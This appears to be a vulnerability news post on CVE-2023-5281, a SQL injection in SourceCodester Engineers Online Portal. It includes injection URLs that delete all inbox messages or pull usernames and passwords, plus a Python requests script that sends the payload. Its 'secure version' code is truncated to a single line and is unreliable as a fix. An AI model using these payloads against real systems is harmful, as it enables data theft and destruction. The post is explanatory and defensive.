CVE CyberSecurity Database News

CVE-2023-5281 - Critical SQL Injection Vulnerability in SourceCodester Engineers Online Portal 1. (VDB-240909) – Full Details, Exploit, and How to Stay Safe

Poster -

A recent security flaw, tracked as CVE-2023-5281 (VDB-240909), has been discovered in SourceCodester Engineers Online Portal version 1.. Attackers can exploit this vulnerability remotely to execute SQL injection attacks, potentially compromising sensitive data, taking over accounts, or disrupting the service.
The issue lies in the remove_inbox_message.php file, specifically how the id parameter is processed. The problem is critical—if you use this application, you must act immediately.

What Is SQL Injection and Why Is It Dangerous?

SQL Injection (SQLi) happens when user-controlled input is processed by a web server without proper sanitization and sent directly into a SQL database query. Malicious users can craft input to manipulate backend SQL queries, viewing, modifying, or deleting important database records.

For more information on SQL injection:
- OWASP SQL Injection

Details of CVE-2023-5281

- Vulnerable Product: SourceCodester Engineers Online Portal 1.

According to Vuldb Entry VDB-240909

> A vulnerability, classified as critical, was found in SourceCodester Engineers Online Portal 1.. ... The manipulation of the argument id ... leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public.

Let’s look at the likely vulnerable snippet from remove_inbox_message.php

// Vulnerable PHP code (hypothetical)
$id = $_GET['id'];
$sql = "DELETE FROM inbox WHERE id = $id";
mysqli_query($conn, $sql);

What went wrong?

- The id parameter is taken straight from user input ($_GET['id']) without validation or sanitization.

An attacker can simply visit the following URL

http://victim.site/remove_inbox_message.php?id=1 OR 1=1

This would delete *every* message in the inbox because the query becomes

DELETE FROM inbox WHERE id = 1 OR 1=1

Attackers can go further and leak database content, for example

http://victim.site/remove_inbox_message.php?id= UNION SELECT 1, username, password FROM users--

If the web page echoes back any data or if error messages are enabled, attackers can extract sensitive info.

Here’s a simple example in Python using requests

import requests

target = "http://victim.site/remove_inbox_message.php";
payload = " UNION SELECT 1, username, password FROM users--"
url = f"{target}?id={payload}"

response = requests.get(url)
print(response.text)

`php

// Secure version

$stmt->execute();

`

- Update immediately: If you use this application, check for patches or updates from the vendor (SourceCodester Projects).
- Restrict database permissions. Limit the privileges of your database users.

---

## References

- Vuldb Entry for VDB-240909
- Original SourceCodester Project
- Full Disclosure – Exploit Details

---

## Summary Table

| CVE ID | Product | File | Parameter | Impact |
|----------------|----------------------------|------------------------|-----------|------------------------------------------|
| CVE-2023-5281 | Engineers Online Portal 1. | remove_inbox_message.php | id | SQLi: Data theft, deletion, full access |

---

## Conclusion

CVE-2023-5281 is a critical vulnerability that threatens the security of SourceCodester Engineers Online Portal 1. users. With public exploit details available, attackers can easily compromise your site. Patch your systems, audit your code, and stay safe!

*For more breakdowns on real-world vulnerabilities, keep following up-to-date security resources and always keep your systems patched.*

Timeline

Published on: 09/29/2023 19:15:09 UTC
Last modified on: 11/07/2023 04:23:46 UTC